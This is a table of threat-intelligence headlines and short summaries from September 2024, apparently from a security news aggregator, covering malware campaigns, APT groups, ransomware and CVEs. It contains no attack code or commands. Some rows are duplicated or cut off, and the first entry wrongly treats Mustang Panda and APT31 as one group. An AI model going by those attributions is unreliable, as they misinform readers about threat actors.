17.9.24 | Fireant (APT31) unveils new tools in recent campaign against Asia-Pacific government entities | APT | The China-linked threat actor known as Fireant (also referred to as Mustang Panda or APT31) has recently been observed using new tools, including PUBLOAD, FDMTP, and PTSOCKET, in espionage attacks targeting government entities in the Asia-Pacific region. | |
17.9.24 | Ajina mobile banking trojan | VIRUS | Ajina is a recently identified mobile banking trojan variant heavily targeting the Central Asia region. The malware focuses on theft of confidential user data including banking details as well as attempts to intercept the 2FA information. | |
17.9.24 | Stealthy malware targets US-Taiwan Defense Industry conference attendees | VIRUS | A malware campaign targeting entities linked to the upcoming US-Taiwan Defense Industry Conference has been reported. Victims are lured with documents containing a ZIP archive and an LNK file disguised as a legitimate PDF registration form. | |
17.9.24 | CloudImposer | VULNEREBILITY | CVE | CloudImposer: Executing Code on Millions of Google Servers with a Single Malicious Package |
17.9.24 | Phishing Pages Delivered Through Refresh HTTP Response Header | HACKING | PHISHING | Phishing Pages Delivered Through Refresh HTTP Response Header |
17.9.24 | RustDoor | MALWARE | CRYPTOCURRENCY | North Korean Hackers Target Cryptocurrency Users on LinkedIn with RustDoor Malware |
17.9.24 | Protect Your Crypto | CRYPTOCURRENCY | CRYPTOCURRENCY | Protect Your Crypto: Understanding the Ongoing Global Malware Attacks and What We Are Doing to Stop Them |
17.9.24 | CVE-2024-28991 | VULNEREBILITY | CVE | SolarWinds Access Rights Manager (ARM) Deserialization of Untrusted Data Remote Code Execution Vulnerability (CVE-2024-28991) |
15.9.24 | 2024-09-12 - Approximately 11 days of server scans and probes | MALWARE TRAFFIC | MALWARE TRAFFIC | Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website. |
15.9.24 | 2024-09-11 - Data Dump: Remcos RAT and XLoader (Formbook) | MALWARE TRAFFIC | MALWARE TRAFFIC | Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website. |
14.9.24 | About the security content of visionOS 1.3 | VULNEREBILITY | CVE | This document describes the security content of visionOS 1.3. |
14.9.24 | TrickMo | MALWARE | Banking | A new TrickMo saga: from Banking Trojan to Victim's Data Leak |
14.9.24 | CVE-2024-6671 | VULNEREBILITY | CVE | In WhatsUp Gold versions released before 2024.0.0, if the application is configured with only a single user, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password. |
14.9.24 | CVE-2024-6670 | VULNEREBILITY | CVE | In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password. |
14.9.24 | Hadooken | MALWARE | Linux | Hadooken Malware Targets Weblogic Applications |
13.9.24 | Mekotio and Mispadu malware distributed during Gecko Assault campaign | VIRUS | A new malicious campaign dubbed Gecko Assault has been reported by the researchers from SCILabs. The threat actors have been distributing two different payloads belonging to the URSA/Mispadu and the Mekotio malware families. | |
13.9.24 | AutoIt-based credential flusher leveraged alongside StealC infostealer | VIRUS | A new campaign delivering the StealC infostealer malware has been observed in the wild. The initial stages of the attack use Amadey malware for loading the infostealer onto the targeted endpoints. In conjunction to the delivered StealC payload, the attackers are leveraging an AutoIt-based credential flusher malware. | |
13.9.24 | Hadooken - Linux malware targeting Weblogic servers | VIRUS | Hadooken is a new Linux malware variant targeting Oracle Weblogic servers. In the initial attack stages the threat actors exploit known vulnerabilities, server misconfigurations or use weak or otherwise compromised credentials to get access to the targeted environments. Upon execution on the vulnerable server instances Hadooken drops two distinct payloads - Tsunami malware and another binary used for mining cryptocurrency. | |
13.9.24 | ShrinkLocker Ransomware: Leveraging BitLocker for encryption and system disruption | RANSOM | ShrinkLocker is a recently discovered ransomware that exploits BitLocker, a legitimate Windows feature, to encrypt data and lock users out of their systems. Unlike traditional ransomware, ShrinkLocker uses BitLocker's secure boot partition to make decryption extremely difficult. | |
13.9.24 | New Phishing Campaign Exploiting CapCut | PHISHING | CapCut, a popular video editor, is being exploited in phishing attacks. The latest campaign involves a malicious package that includes a legitimate CapCut app, JamPlus build utility, and a harmful ".lua" script. Running the app triggers JamPlus to execute the script, which then downloads and runs a final payload from a remote server. | |
13.9.24 | Veaty and Spearal: Emerging malware in recent campaign against Iraqi Government | VIRUS | A new malware family, Veaty and Spearal, has been reported by Check Point, a CTA member, as being used in a campaign targeting Iraqi government infrastructure. The malware employs several techniques, including a passive IIS backdoor, DNS tunneling, and command-and-control (C2) communication through compromised email accounts. | |
13.9.24 | Ajina.Banker | MALWARE | Banking | Ajina attacks Central Asia: Story of an Uzbek Android Pandemic |
13.9.24 | MALWARE | TV | Void captures over a million Android TV boxes | |
13.9.24 | Proxyjacking | CAMPAIGN | CRYPTOCURRENCY | From Automation to Exploitation: The Growing Misuse of Selenium Grid for Cryptomining and Proxyjacking |
13.9.24 | Spearal | MALWARE | ISS Backdoor | Targeted Iranian Attacks Against Iraqi Government Infrastructure |
13.9.24 | Veaty | MALWARE | ISS Backdoor | Targeted Iranian Attacks Against Iraqi Government Infrastructure |
13.9.24 | OilRig | APT | APT | Targeted Iranian Attacks Against Iraqi Government Infrastructure |
13.9.24 | Quad7 | BOTNET | BOTNET | A glimpse into the Quad7 operators’ next moves and associated botnets |
13.9.24 | DragonRank | GROUP | GROUP | DragonRank, a Chinese-speaking SEO manipulator service provider |
13.9.24 | Yet Another Silly Stealer (YASS) Infostealer | VIRUS | A new infostealer, being referred to as 'Yet Another Silly Stealer' (YASS), has been observed. While it shares some features with CryptBot, YASS also has distinct characteristics. The research compares YASS to CryptBot, emphasizing YASS's unique code and its delivery via a multi-stage downloader called MustardSandwich. This downloader, executed through a Windows LNK file, involves two JScript stages and two PowerShell stages, with the first PowerShell script run via an ActiveXObject. | |
13.9.24 | BLX (aka XLABB) Stealer activity | VIRUS | BLX Stealer known also as XLABB Stealer is a malware variant initially discovered back last year. New activity attributed to this infostealer has been observed in the wild. BLX is an open-source malware actively distributed via Telegram and other platforms. Functionality-wise the malware is capable of stealing confidential data from compromised endpoints. The exfiltration efforts focus on data such as credentials, information stored in browsers, 3rd party applications accounts, Discord tokens, cryptocurrency wallets and others. | |
13.9.24 | SEO manipulation leveraged for PlugX and BadIIS malware delivery | VIRUS | A new malicious campaign attributed to the DragonRank threat group has been discovered by researchers from Cisco Talos. The attackers have been reported to leverage search engine optimization (SEO) manipulation techniques to deploy malicious webshells, collect information off the infected systems as well as to deliver PlugX and BadIIS malware payloads. | |
13.9.24 | Ransomware activity surge observed in second quarter of 2024 | RANSOM | Ransomware activity increased markedly in the second quarter of 2024 as attackers seemingly recovered their momentum following the disruption experienced in late 2023 and early 2024. Analysis of data from ransomware leak sites found that ransomware actors claimed 1,310 attacks in the second quarter of 2024, a 36% increase on the first quarter of this year. This was the second highest amount of attacks claimed in a quarter by ransomware operators, short of the record 1,488 attacks claimed in the third quarter of 2023. | |
13.9.24 | Linux SSH servers targeted by new SuperShell malware variant | VIRUS | SuperShell malware variant has been observed in a recent campaign targeted at vulnerable or otherwise misconfigured Linux SSH servers. The malware is Go-based and has the functionality to act as a reverse shell effectively allowing the attackers remote control and remote code execution on the infected machine. The servers compromised with use of SuperShell malware are likely to be used later by the attackers for the purpose of cryptomining or DDoS attacks. | |
13.9.24 | ScRansom Ransomware | Researchers have found that the CosmicBeetle group is now using a new ransomware dubbed ScRansom, replacing their old Scarab ransomware. They are targeting small and medium businesses worldwide and are copying LockBit's style in their ransom notes and websites. CosmicBeetle is suspected to be affiliated with RansomHub, a recently active ransomware gang that has been increasing its operations since March 2024. | ||
13.9.24 | VSCode abused by Chinese APT group | APT | Stately Taurus, a Chinese APT group that carries out cyber-espionage attacks, has abused Visual Studio Code software in espionage operations targeting government entities in Southeast Asia. This threat actor used VSCode’s embedded reverse shell feature to gain a foothold in target networks to execute arbitrary code and deliver additional payloads. The leveraged this mechanism to deliver malware, perform reconnaissance, and exfiltrate sensitive data. | |
13.9.24 | New variant of Cicada3301 ransomware found in the wild | RANSOM | According to a recent report from Palo Alto, Repellent Scorpius is a new ransomware-as-a-service (RaaS) group responsible for the delivery of a ransomware variant dubbed Cicada3301. The threat actors have been observed to leverage a variety of Living-Off-the-Land (LOTL) tools in their attacks. Among them PsExec for ransomware execution and Rclone tool used for data exfiltration. | |
13.9.24 | Mekotio and BBTok malware remain active among the banking trojans targeting LATAM | VIRUS | Mekotio and BBTok malware variants remain active among the banking trojan families distributed lately across the Latin America region. The malware is usually spread via phishing campaigns utilizing business- or judicial-themed lures. The spam emails leverage either links leading to malicious archive downloads or use malicious attachments directly within the spam emails. While Mekotio is an older malware variant, BBTok was initially discovered just in 2020. Both variants target similar geographical locations and attempt to exfiltrate credentials and sensitive information in order to carry out unauthorized banking operations. | |
13.9.24 | Threat actors spoof An Post Ireland services to steal credentials | CRIME | Symantec has identified a new wave of phishing attacks that impersonate An Post Ireland services to steal credentials. An Post Ireland is a state owned postal service provider in Ireland. In this campaign, phishing emails are disguised as parcel notifications to reschedule deliveries or check parcel details. The email content is brief, encouraging recipients to click on a phishing URL. Once clicked, victims encounter webpages designed for credential harvesting. | |
13.9.24 | SpyAgent: Mobile malware stealing cryptocurrency wallets through image scanning | VIRUS | A new mobile malware called SpyAgent has been identified targeting mnemonic keys by scanning for images on your device that might contain them. A mnemonic key is a 12-word phrase used to recover cryptocurrency wallets. These secret phrases are highly valuable to threat actors because gaining access to them enables them to restore your wallet on their own devices and steal all the funds stored within. | |
13.9.24 | Emerging Loki Backdoor variant employs Mythic Framework and Havoc Techniques | VIRUS | A new version of the Loki backdoor has been discovered targeting Russian organizations. This variant is compatible with the Mythic framework and utilizes various techniques from the Havoc framework, which complicates analysis. The updated variant is divided into a loader and a DLL. The loader gathers system information from the compromised machine, uploads it to the attacker’s C2 server, and retrieves the DLL in response. The DLL is then loaded into memory to download additional payloads and carry out further attacks. | |
11.9.24 | Latrodectus campaign impersonates Antivirus software to deploy remote payloads | CAMPAIGN | A campaign deploying Latrodectus malware, disguised as a legitimate antivirus vendor, has been reported. The initial attack vector involves phishing and malicious ads. Latrodectus functions as a backdoor, allowing the execution of remote commands and the deployment of malicious payloads such as Brute Ratel C4. It employs common techniques for persistence, including the use of the Windows Component Object Model (COM) and employs TLS certificates for communication with its command-and-control (C2) server. | |
11.9.24 | CVE-2024-45195: Remote Code Execution (RCE) vulnerability in Apache OFBiz | VULNEREBILITY | CVE-2024-45195 is a high-severity (CVSS: 7.5) Remote Code Execution (RCE) vulnerability in Apache OFBiz, a comprehensive suite of business applications. An attacker could likely exploit this vulnerability by framing a specially designed URL that bypasses authentication protocols. If successfully exploited, this vulnerability will allow remote attackers to execute malicious code on the server, potentially leading to complete system compromise. | |
11.9.24 | Ongoing exploitation of CVE-2024-36401 in OSGeo GeoServer GeoTools | VULNEREBILITY | Multiple campaigns are exploiting a recently disclosed security flaw in OSGeo GeoServer GeoTools. The vulnerability, identified as CVE-2024-36401 (with a CVSS score of 9.8), is a critical remote code execution bug that allows malicious actors to take control of affected instances. This flaw has been leveraged to deploy GOREVERSE, a reverse proxy server designed to connect with a command-and-control (C2) server for post-exploitation activities. | |
11.9.24 | TIDRONE activities in Taiwan | GROUP | In recent news, the TIDRONE group has been targeting Taiwan's military and satellite industries, focusing on drone manufacturers. Using malicious tools like CXCLNT and CLNTEND, the group enables data theft, credential dumping, and user control bypass. According to reports, their Tactics, Techniques, and Procedures (TTPs) include supply chain attacks via ERP software, pointing towards espionage motives. | |
11.9.24 | Babylon open-source RAT targets Malaysia | VIRUS | Babylon RAT is an open-source malware variant recently distributed to users in Malaysia. The attack chain involves usage of crafted .iso files mimicking PDF documents. The delivered ISO archive contains a hidden PowerShell script, a decoy PDF document and a malicious executable leading to infection with the Babylon RAT. | |
11.9.24 | Babylon open-source RAT targets Malaysia | VIRUS | Babylon RAT is an open-source malware variant recently distributed to users in Malaysia. The attack chain involves usage of crafted .iso files mimicking PDF documents. The delivered ISO archive contains a hidden PowerShell script, a decoy PDF document and a malicious executable leading to infection with the Babylon RAT. | |
11.9.24 | ToneShell Backdoor Targets IISS Summit | VIRUS | A cyber espionage campaign involving the ToneShell backdoor, attributed to Mustang Panda, has been reported targeting attendees of the 2024 IISS Defense Summit in Prague. The attack leverages a malicious PIF file disguised as summit documents to gain access to sensitive defense discussions. The malware achieves persistence via registry run keys and scheduled tasks and communicates with a C2 server in Hong Kong using raw TCP that mimics TLS. | |
11.9.24 | BlindEagle strikes Colombia's Insurance sector with Quasar RAT variant | VIRUS | BlindEagle, an advanced persistent threat actor, has been observed targeting Colombia’s insurance sector with the BlotchyQuasar Remote Access Trojan (RAT). The attack chain begins with phishing emails impersonating the Colombian tax authority, containing links to malware hosted on compromised Google Drive accounts. | |
11.9.24 | Crimson Palace | CAMPAIGN | APT | Crimson Palace returns: New Tools, Tactics, and Targets |
11.9.24 | Earth Preta | CAMPAIGN | APT | Earth Preta Evolves its Attacks with New Malware and Strategies |
11.9.24 | CVE-2024-38014 | VULNEREBILITY | CVE | (CVSS score: 7.8) - Windows Installer Elevation of Privilege Vulnerability |
11.9.24 | CVE-2024-38217 | VULNEREBILITY | CVE | (CVSS score: 5.4) - Windows Mark-of-the-Web (MotW) Security Feature Bypass Vulnerability |
11.9.24 | CVE-2024-38226 | VULNEREBILITY | CVE | (CVSS score: 7.3) - Microsoft Publisher Security Feature Bypass Vulnerability |
11.9.24 | CVE-2024-43491 | VULNEREBILITY | CVE | (CVSS score: 9.8) - Microsoft Windows Update Remote Code Execution Vulnerability |
11.9.24 | CVE-2024-29847 | VULNEREBILITY | CVE | (CVSS score: 10.0) - A deserialization of untrusted data vulnerability that allows a remote unauthenticated attacker to achieve code execution. |
11.9.24 | CosmicBeetle | GROUP | RANSOMWARE | CosmicBeetle steps up: Probation period at RansomHub |
11.9.24 | PIXHELL | ATTACK | ATTACK | PIXHELL Attack: Leaking Sensitive Information from Air-Gap Computers via ‘Singing Pixels?/P> |
11.9.24 | RAMBO | ATTACK | ATTACK | RAMBO: Leaking Secrets from Air-Gap Computers by Spelling Covert Radio Signals from Computer RAM |
9.9.24 | BlindEagle | APT | APT | BlindEagle Targets Colombian Insurance Sector with BlotchyQuasar |
9.9.24 | Mustang Panda | APT | APT | Chinese APT Abuses VSCode to Target Government in Asia |
9.9.24 | WhisperGate | MALWARE | Wrapper | WhisperGate is a multi-stage wiper designed to look like ransomware that has been used against multiple government, non-profit, and information technology organizations in Ukraine since at least January 2022. |
9.9.24 | RAMBO | ATTACK | ATTACK | RAMBO: Leaking Secrets from Air-Gap Computers by Spelling Covert Radio Signals from Computer RAM |
9.9.24 | EUCLEAK | ATTACK | ATTACK | Side-Channel Attack on the YubiKey 5 Seri |
9.9.24 | CVE-2024-32896 | VULNEREBILITY | CVE | there is a possible way to bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. |
9.9.24 | CVE-2024-42057 | VULNEREBILITY | CVE | A command injection vulnerability in the IPSec VPN feature of Zyxel ATP series firmware versions from V4.32 through V5.38, USG FLEX series firmware versions from V4.50 through V5.38, USG FLEX 50(W) series firmware versions from V4.16 through |
9.9.24 | CVE-2024-7261 | VULNEREBILITY | CVE | The improper neutralization of special elements in the parameter "host" in the CGI program of Zyxel NWA1123ACv3 firmware version 6.70(ABVT.4) and earlier, WAC500 firmware version 6.70(ABVS.4) and earlier, WAX655E firmware version 7.00(ACDO.1) |
9.9.24 | CVE-2024-7591 | VULNEREBILITY | CVE | Improper Input Validation vulnerability in Progress LoadMaster allows OS Command Injection.This issue affects: * LoadMaster: 7.2.40.0 and above * ECS: All versions * Multi-Tenancy: 7.1.35.4 and above |
9.9.24 | Android SpyAgent | MALWARE | Android | New Android SpyAgent Campaign Steals Crypto Credentials via Image Recognition |
9.9.24 | Loki | MALWARE | Backdoor | Loki: a new private agent for the popular Mythic framework |
9.9.24 | Unit 29155 | GROUP | Military group | Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure |
9.9.24 | TIDRONE | MALWARE | Military Malware | TIDRONE Targets Military and Satellite Industries in Taiwan |
8.9.24 | CVE-2024-41622 | VULNEREBILITY | CVE | Remote Command Execution (RCE) vulnerability via the tomography_ping_address parameter in the /HNAP1/ interface. (CVSS v3 score: 9.8 "critical") |
8.9.24 | CVE-2024-44340 | VULNEREBILITY | CVE | RCE vulnerability via the smartqos_express_devices and smartqos_normal_devices parameters in SetSmartQoSSettings (authenticated access requirement reduces the CVSS v3 score to 8.8 "high"). |
8.9.24 | CVE-2024-44341 | VULNEREBILITY | CVE | RCE vulnerability via the lan(0)_dhcps_staticlist parameter, exploitable through a crafted POST request. (CVSS v3 score: 9.8 "critical") |
8.9.24 | CVE-2024-44342 | VULNEREBILITY | CVE | RCE vulnerability via the wl(0).(0)_ssid parameter. (CVSS v3 score: 9.8 "critical") |
8.9.24 | Cicada3301 | RANSOMWARE | RANSOMWARE | Dissecting the Cicada |
8.9.24 | COVERTCATCH | MALWARE | Python | North Korean Threat Actors Deploy COVERTCATCH Malware via LinkedIn Job Scams |
8.9.24 | CVE-2024-40766 | VULNEREBILITY | CVE | SonicOS Improper Access Control Vulnerability |
8.9.24 | CVE-2024-36401 | EXPLOIT | EXPLOIT | Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401 |
7.9.24 | CVE-2024-44000 | VULNEREBILITY | CVE | Critical Account Takeover Vulnerability Patched in LiteSpeed Cache Plugin |
7.9.24 | CVE-2024-45195 | VULNEREBILITY | CVE | Direct Request ('Forced Browsing') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.16. Users are recommended to upgrade to version 18.12.16, which fixes the issue. |
7.9.24 | Tropic Trooper | APT | APT | Tropic Trooper spies on government entities in the Middle East |
7.9.24 | Veeam Security Bulletin (September 2024) | VULNEREBILITY | CVE | All vulnerabilities disclosed in this section were discovered during internal testing (unless otherwise indicated) and affect Veeam Backup & Replication 12.1.2.172 and all earlier version 12 builds. |
6.9.24 | Tropic Trooper unleashes new China Chopper variant and Crowdoor loader | APT | Tropic Trooper, a Chinese-speaking APT group, has been reported targeting Middle Eastern government entities in a cyber espionage campaign. The attackers focused on systems related to human rights studies, using a new China Chopper variant deployed on a compromised Umbraco CMS server. The group employed DLL hijacking to load malicious payloads, including Crowdoor, a loader linked to the SparrowDoor backdoor. | |
6.9.24 | Spammers abusing uncommon TLDs | SPAM | Symantec has recently observed a new phishing campaign being delivered from recently created domains designed to steal credentials and/or banking information. In this campaign we have observed over 200 newly registered domains, most of these domains are registered with uncommon TLDs such as '.best', '.rest' or '.shop'. The subjects and message content attempt to lure recipients in with promises of dubious health products. | |
6.9.24 | Formbook Targets Global Sectors with Fake RFQ from Chemical-Oil Joint Venture | VIRUS | Symantec has recently observed a Formbook actor impersonating a major joint venture between a global chemical company based in Germany and a national oil and gas company from Malaysia. In this malicious email campaign, they're targeting companies across multiple countries and various industry sectors, including: | |
6.9.24 | Acab Infostealer | VIRUS | Acab is a Python-based infostealing malware variant recently observed in the wild. The malware shows some code similarities to another variant known as 1312 Stealer. Acab has the functionality to extract various confidential information from infected endpoints including credentials, banking information, crypto-wallet data, application data/tokens, various information stored in web browsers and others. | |
6.9.24 | CVE-2024-5932 - GiveWP WordPress Plugin vulnerability | VULNEREBILITY | CVE-2024-5932 is a recently disclosed vulnerability affecting GiveWP plugin, which is a Donation and Fundraising Platform plugin for WordPress. The flaw allows for malicious injection within the vulnerable version of the plugin, up to 3.14.1. Successfully exploitation of this flaw might allow unauthenticated attackers to inject an arbitrary PHP Object which can further lead up to arbitrary code execution within the context of the vulnerable application. A patched version 3.14.2 of the plugin has been already released. | |
6.9.24 | MacroPack generated payloads distributed in latest campaigns | CAMPAIGN | A payload generation framework called MacroPack has been leveraged to create miscellaneous payloads in a series of malicious activities recently observed by the researchers from Cisco Talos. The attackers have been using Word, Excel or PowerPoint lures that once opened run malicious MacroPack VBA code that ultimately leads to the final payload delivery and execution. Among the distributed payloads were Brute Ratel and Havoc post-exploitation tools as well as a new variant of the PhantomCore RAT. | |
6.9.24 | KTLVdoor backdoor leveraged by the Funnelweb APT | VIRUS | A new Golang-based backdoor dubbed KTLVdoor has been discovered by researchers from Trend Micro. The malware has been attributed to the Funnelweb APT (also known as Earth Lusca). KTLVdoor is a highly obfuscated malware that comes in variants supporting both Windows and Linux platforms. Functionality-wise the malware is capable of running commands and shellcode received from the C2 servers, various file and directory operations on the infected machine including file download/upload, among others. | |
6.9.24 | SLOW#TEMPEST campaign targets Chinese entities | CAMPAIGN | A recently identified malware campaign named SLOW#TEMPEST was uncovered targeting Chinese entities. The attack chain starts by way of malspam attachments in the form of zip files which are bundled with a shortcut lnk file in addition to dll/exe files. Successful execution of the available content leads to the establishment of a foothold in the targeted environment. Through this position, the attackers can execute further TTPs to accomplish their goals (such as credential harvesting, lateral movement, persistence and privilege escalation). | |
6.9.24 | Latrodectus 1.4: New version unveiled with advanced capabilities | VIRUS | A newer version of the Latrodectus downloader has been observed, featuring enhancements like a new string deobfuscation method, a revised C2 endpoint, and two additional backdoor commands. The infection chain begins with a heavily obfuscated JavaScript file, which uses numerous comments to inflate file size and complexity, complicating analysis. The malware then extracts and executes hidden code, subsequently downloading and installing an MSI file from a remote server. This MSI file loads an obfuscated DLL to perform its malicious tasks. | |
5.9.24 | Emansrepo infostealer | VIRUS | Researchers from Fortinet reported on a new Python-based infostealer variant dubbed Emansrepo. This malware has been distributed via phishing campaigns masquerading the malicious emails as purchase invoices or orders. The initial attack chain stage varies depending on the campaign and may leverage different attachments such as .html or .7z. | |
5.9.24 | Zharkbot malware | VIRUS | Zharkbot is a C++based malware loader variant being dropped by Amadey trojan in some recently observed campaigns. Zharkbot employs various anti-analysis, anti-VM and sandbox detection/evasion techniques. Once on the compromised machine, the malware will attempt to set up persistence by copying itself to the temp folder and setting up a scheduled task execution. | |
5.9.24 | CVE-2024-24809 & CVE-2024-31214 vulnerabilities affecting Traccar 5 | VULNEREBILITY | CVE-2024-24809 and CVE-2024-31214 are recently disclosed vulnerabilities affecting Traccar 5 which is an open-source GPS tracking system. The vulnerabilities are rated as CVSS score: 8.5 and CVSS score: 9.7 respectively. Successful exploitation in the affected product versions 5.1 through 5.12 could provide unauthenticated attackers with path traversal and unrestricted upload of arbitrary files. | |
5.9.24 | CVE-2024-22319 - JNDI Injection Vulnerability in IBM Operational Decision Manager | VULNEREBILITY | CVE-2024-22319 is a critical (CVSS: 9.8) JNDI injection vulnerability in IBM Operational Decision Manager. IBM ODM is a comprehensive decision automation solution that helps organizations automate and optimize their decision-making processes. Attackers can exploit this flaw by injecting malicious code into an unchecked argument passed to a specific API through JNDI (Java Naming and Directory Interface). | |
5.9.24 | Stone Wolf campaign targets Russian firms with Meduza Stealer malware | CAMPAIGN | A malicious campaign by the Stone Wolf threat actor targeting Russian firms has been reported. The attackers use phishing emails impersonating a legitimate industrial automation provider to deliver the Meduza Stealer malware. The attack vector involves an archive containing a legitimate document alongside a malicious link to download and execute the Stealer payload. | |
5.9.24 | WailingCrab: A WikiLoader variant exploiting VPN Spoofs | VIRUS | A recent report from Palo Alto reveals that WailingCrab, a variant of WikiLoader, is being distributed through SEO poisoning and spoofed GlobalProtect VPN software. This campaign primarily targets the U.S. higher education and transportation sectors. The attack vector involves multiple stages like DLL sideloading, shellcode injection, and using MQTT for command and control. | |
5.9.24 | Luxy Infostealer | VIRUS | Luxy is a recently discovered malware variant with both infostealing and ransomware capabilities. Luxy collects various confidential information from the compromised machines including credentials, browser data, cookies, cryptocurrency wallets, etc. The ransomware module is used to encrypt files on the infected endpoint using AES256 algorithm. | |
5.9.24 | Cybercriminals Target Malaysia’s Digital Lifestyle with SpyNote | VIRUS | Around the world, E-commerce (shopping), service-oriented (food delivery, ride-hailing, and on-demand services), digital payment and deal aggregator android applications are highly popular. | |
5.9.24 | CVE-2024-7593 - Ivanti Virtual Traffic Manager (vTM) Authentication Bypass vulnerability | VULNEREBILITY | CVE-2024-7593 is a critical (CVSS score 9.8) XML authentication bypass vulnerability affecting Ivanti Virtual Traffic Manager (vTM). Successful exploitation of this flaw could allow the attackers to bypass authentication and create new administrative users. | |
5.9.24 | RAZR Ransomware | RANSOM | RAZR is a recently identified ransomware variant that abuses web hosting service called PythonAnywhere for hosting the malicious binaries. The malware uses AES-256 algorithm for encryption and appends .raz extension to the filenames. The ransom note is dropped in form of a text file README.txt in which the attackers also threaten that the confidential files have not only been encrypted but also exfiltrated. | |
5.9.24 | Macropack | HACKING | Malware | Threat actors using MacroPack to deploy Brute Ratel, Havoc and PhantomCore payloads |
5.9.24 | KTLVdoor | MALWARE | Backdoor | Earth Lusca Uses KTLVdoor Backdoor for Multiplatform Intrusion |
5.9.24 | CVE-2024-20439 | VULNEREBILITY | CVE | (CVSS score: 9.8) - The presence of an undocumented static user credential for an administrative account that an attacker could exploit to log in to an affected system |
5.9.24 | CVE-2024-20440 | VULNEREBILITY | CVE | (CVSS score: 9.8) - A vulnerability arising due to an excessively verbose debug log file that an attacker could exploit to access such files by means of a crafted HTTP request and obtain credentials that can be used to access the API |
5.9.24 | APT Lazarus | APT | APT | APT Lazarus: Eager Crypto Beavers, Video calls and Games |
5.9.24 | RansomHub Ransomware | RANSOMWARE | RANSOMWARE | #StopRansomware: RansomHub Ransomwa |
5.9.24 | CVE-2024-7261 | VULNEREBILITY | CVE | The improper neutralization of special elements in the parameter "host" in the CGI program of Zyxel NWA1123ACv3 firmware version 6.70(ABVT.4) and earlier, WAC500 firmware version 6.70(ABVS.4) and earlier, WAX655E firmware version 7.00(ACDO.1) and earlier, WBE530 firmware version 7.00(ACLE.1) |
5.9.24 | Revival Hijack | HACKING | HACKING | Revival Hijack – PyPI hijack technique exploited in the wild, puts 22K packages at risk |
5.9.24 | CVE-2024-32896 | VULNEREBILITY | CVE | there is a possible way to bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. |
5.9.24 | WikiLoader | MALWARE | Loader | Spoofed GlobalProtect Used to Deliver Unique WikiLoader Variant |
5.9.24 | Head Mare | GROUP | GROUP | Head Mare: adventures of a unicorn in Russia and Belarus |
5.9.24 | Cicada3301 | RANSOMWARE | RANSOMWARE | Decoding the Puzzle: Cicada3301 Ransomware Threat Analysis |
5.9.24 | Rocinante | MALWARE | Trojan | Rocinante: The trojan horse that wanted to fly |